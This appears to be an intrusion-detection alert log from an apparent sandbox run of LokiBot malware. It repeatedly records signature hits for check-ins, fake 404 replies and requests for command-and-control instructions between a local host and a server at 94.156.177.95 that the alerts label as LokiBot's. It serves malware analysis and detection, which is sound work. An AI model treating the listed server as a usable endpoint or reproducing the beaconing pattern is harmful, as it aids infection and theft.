                                                                                                                    2024-11-15T18:15:02.676612+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54990594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:02.681975+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549905TCP
                                                                                                                    2024-11-15T18:15:02.843351+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54990994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:02.843351+01002025381ET MALWARE LokiBot Checkin1192.168.2.54990994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:02.843351+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54990994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:03.787032+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54990994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:03.787032+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54990994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:03.792789+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549909TCP
                                                                                                                    2024-11-15T18:15:03.944044+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54991594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:03.944044+01002025381ET MALWARE LokiBot Checkin1192.168.2.54991594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:03.944044+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54991594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:04.910372+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54991594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:04.910372+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54991594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:04.915936+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549915TCP
                                                                                                                    2024-11-15T18:15:05.079130+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54992094.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:05.079130+01002025381ET MALWARE LokiBot Checkin1192.168.2.54992094.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:05.079130+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54992094.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:06.064903+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54992094.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:06.064903+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54992094.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:06.070494+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549920TCP
                                                                                                                    2024-11-15T18:15:06.232263+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54992594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:06.232263+01002025381ET MALWARE LokiBot Checkin1192.168.2.54992594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:06.232263+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54992594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:07.206218+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54992594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:07.206218+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54992594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:07.212159+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549925TCP
                                                                                                                    2024-11-15T18:15:07.371818+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54993194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:07.371818+01002025381ET MALWARE LokiBot Checkin1192.168.2.54993194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:07.371818+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54993194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:08.362963+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54993194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:08.362963+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54993194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:08.368386+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549931TCP
                                                                                                                    2024-11-15T18:15:08.527825+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54993594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:08.527825+01002025381ET MALWARE LokiBot Checkin1192.168.2.54993594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:08.527825+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54993594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:09.478766+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54993594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:09.478766+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54993594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:09.483923+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549935TCP
                                                                                                                    2024-11-15T18:15:09.646081+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54994194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:09.646081+01002025381ET MALWARE LokiBot Checkin1192.168.2.54994194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:09.646081+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54994194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:10.588289+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54994194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:10.588289+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54994194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:10.593620+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549941TCP
                                                                                                                    2024-11-15T18:15:10.738508+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54994794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:10.738508+01002025381ET MALWARE LokiBot Checkin1192.168.2.54994794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:10.738508+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54994794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:11.699501+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54994794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:11.699501+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54994794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:11.704837+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549947TCP
                                                                                                                    2024-11-15T18:15:11.909051+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54995294.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:11.909051+01002025381ET MALWARE LokiBot Checkin1192.168.2.54995294.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:11.909051+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54995294.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:12.850507+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54995294.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:12.850507+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54995294.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:12.856000+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549952TCP
                                                                                                                    2024-11-15T18:15:13.033207+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54995994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:13.033207+01002025381ET MALWARE LokiBot Checkin1192.168.2.54995994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:13.033207+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54995994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:13.986959+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54995994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:13.986959+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54995994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:13.992144+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549959TCP
                                                                                                                    2024-11-15T18:15:14.143909+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54996594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:14.143909+01002025381ET MALWARE LokiBot Checkin1192.168.2.54996594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:14.143909+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54996594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:15.095886+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54996594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:15.095886+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54996594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:15.100964+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549965TCP
                                                                                                                    2024-11-15T18:15:15.260992+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54997194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:15.260992+01002025381ET MALWARE LokiBot Checkin1192.168.2.54997194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:15.260992+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54997194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:16.190598+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54997194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:16.190598+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54997194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:16.196125+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549971TCP
                                                                                                                    2024-11-15T18:15:16.354360+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54997694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:16.354360+01002025381ET MALWARE LokiBot Checkin1192.168.2.54997694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:16.354360+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54997694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:17.330232+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54997694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:17.330232+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54997694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:17.335539+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549976TCP
                                                                                                                    2024-11-15T18:15:17.488009+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54998494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:17.488009+01002025381ET MALWARE LokiBot Checkin1192.168.2.54998494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:17.488009+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54998494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:18.444210+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54998494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:18.444210+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54998494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:18.454312+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549984TCP
                                                                                                                    2024-11-15T18:15:18.648637+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54999194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:18.648637+01002025381ET MALWARE LokiBot Checkin1192.168.2.54999194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:18.648637+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54999194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:19.618198+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54999194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:19.618198+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54999194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:19.624026+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549991TCP
                                                                                                                    2024-11-15T18:15:19.770914+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.54999994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:19.770914+01002025381ET MALWARE LokiBot Checkin1192.168.2.54999994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:19.770914+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.54999994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:20.778565+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.54999994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:20.778565+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.54999994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:20.784082+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.549999TCP
                                                                                                                    2024-11-15T18:15:21.183194+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55000694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:21.183194+01002025381ET MALWARE LokiBot Checkin1192.168.2.55000694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:21.183194+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55000694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:22.095646+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55000694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:22.095646+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55000694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:22.101011+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550006TCP
                                                                                                                    2024-11-15T18:15:22.276771+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55001494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:22.276771+01002025381ET MALWARE LokiBot Checkin1192.168.2.55001494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:22.276771+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55001494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:23.204415+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55001494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:23.204415+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55001494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:23.210169+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550014TCP
                                                                                                                    2024-11-15T18:15:23.386905+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55002294.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:23.386905+01002025381ET MALWARE LokiBot Checkin1192.168.2.55002294.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:23.386905+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55002294.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:24.317698+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55002294.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:24.317698+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55002294.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:24.323159+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550022TCP
                                                                                                                    2024-11-15T18:15:24.486068+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55002394.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:24.486068+01002025381ET MALWARE LokiBot Checkin1192.168.2.55002394.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:24.486068+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55002394.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:26.042078+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55002394.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:26.042078+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55002394.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:26.047516+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550023TCP
                                                                                                                    2024-11-15T18:15:26.198172+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55002494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:26.198172+01002025381ET MALWARE LokiBot Checkin1192.168.2.55002494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:26.198172+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55002494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:27.521568+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55002494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:27.521568+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55002494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:27.526873+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550024TCP
                                                                                                                    2024-11-15T18:15:27.680897+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55002594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:27.680897+01002025381ET MALWARE LokiBot Checkin1192.168.2.55002594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:27.680897+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55002594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:28.641531+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55002594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:28.641531+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55002594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:28.646915+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550025TCP
                                                                                                                    2024-11-15T18:15:28.793698+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55002694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:28.793698+01002025381ET MALWARE LokiBot Checkin1192.168.2.55002694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:28.793698+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55002694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:29.755022+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55002694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:29.755022+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55002694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:29.760486+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550026TCP
                                                                                                                    2024-11-15T18:15:29.925408+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55002794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:29.925408+01002025381ET MALWARE LokiBot Checkin1192.168.2.55002794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:29.925408+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55002794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:30.895119+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55002794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:30.895119+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55002794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:30.900416+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550027TCP
                                                                                                                    2024-11-15T18:15:31.052611+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55002894.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:31.052611+01002025381ET MALWARE LokiBot Checkin1192.168.2.55002894.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:31.052611+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55002894.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:32.048760+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55002894.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:32.048760+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55002894.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:32.054223+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550028TCP
                                                                                                                    2024-11-15T18:15:32.214108+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55002994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:32.214108+01002025381ET MALWARE LokiBot Checkin1192.168.2.55002994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:32.214108+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55002994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:33.168332+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55002994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:33.168332+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55002994.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:33.173572+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550029TCP
                                                                                                                    2024-11-15T18:15:33.332376+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55003094.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:33.332376+01002025381ET MALWARE LokiBot Checkin1192.168.2.55003094.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:33.332376+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55003094.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:34.322493+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55003094.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:34.322493+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55003094.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:34.327921+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550030TCP
                                                                                                                    2024-11-15T18:15:34.479837+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55003194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:34.479837+01002025381ET MALWARE LokiBot Checkin1192.168.2.55003194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:34.479837+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55003194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:35.461033+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55003194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:35.461033+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55003194.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:35.466271+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550031TCP
                                                                                                                    2024-11-15T18:15:35.618188+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55003294.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:35.618188+01002025381ET MALWARE LokiBot Checkin1192.168.2.55003294.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:35.618188+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55003294.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:36.584405+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55003294.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:36.584405+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55003294.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:36.589634+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550032TCP
                                                                                                                    2024-11-15T18:15:36.745165+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55003394.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:36.745165+01002025381ET MALWARE LokiBot Checkin1192.168.2.55003394.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:36.745165+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55003394.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:37.681743+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55003394.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:37.681743+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55003394.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:37.687213+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550033TCP
                                                                                                                    2024-11-15T18:15:37.835646+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55003494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:37.835646+01002025381ET MALWARE LokiBot Checkin1192.168.2.55003494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:37.835646+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55003494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:38.775422+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55003494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:38.775422+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55003494.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:38.780886+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550034TCP
                                                                                                                    2024-11-15T18:15:38.930011+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55003594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:38.930011+01002025381ET MALWARE LokiBot Checkin1192.168.2.55003594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:38.930011+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55003594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:39.883593+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55003594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:39.883593+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55003594.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:39.888799+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550035TCP
                                                                                                                    2024-11-15T18:15:40.041826+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55003694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:40.041826+01002025381ET MALWARE LokiBot Checkin1192.168.2.55003694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:40.041826+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55003694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:40.978031+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55003694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:40.978031+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55003694.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:40.983503+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550036TCP
                                                                                                                    2024-11-15T18:15:41.133212+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55003794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:41.133212+01002025381ET MALWARE LokiBot Checkin1192.168.2.55003794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:41.133212+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55003794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:42.128775+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55003794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:42.128775+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55003794.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:42.133977+01002025483ET MALWARE LokiBot Fake 404 Response194.156.177.9580192.168.2.550037TCP
                                                                                                                    2024-11-15T18:15:42.287477+01002021641ET MALWARE LokiBot User-Agent (Charon/Inferno)1192.168.2.55003894.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:42.287477+01002025381ET MALWARE LokiBot Checkin1192.168.2.55003894.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:42.287477+01002825766ETPRO MALWARE LokiBot Checkin M21192.168.2.55003894.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:43.271865+01002024313ET MALWARE LokiBot Request for C2 Commands Detected M11192.168.2.55003894.156.177.9580TCP
                                                                                                                    2024-11-15T18:15:43.271865+01002024318ET MALWARE LokiBot Request for C2 Commands Detected M21192.168.2.55003894.156.177.9580TCP
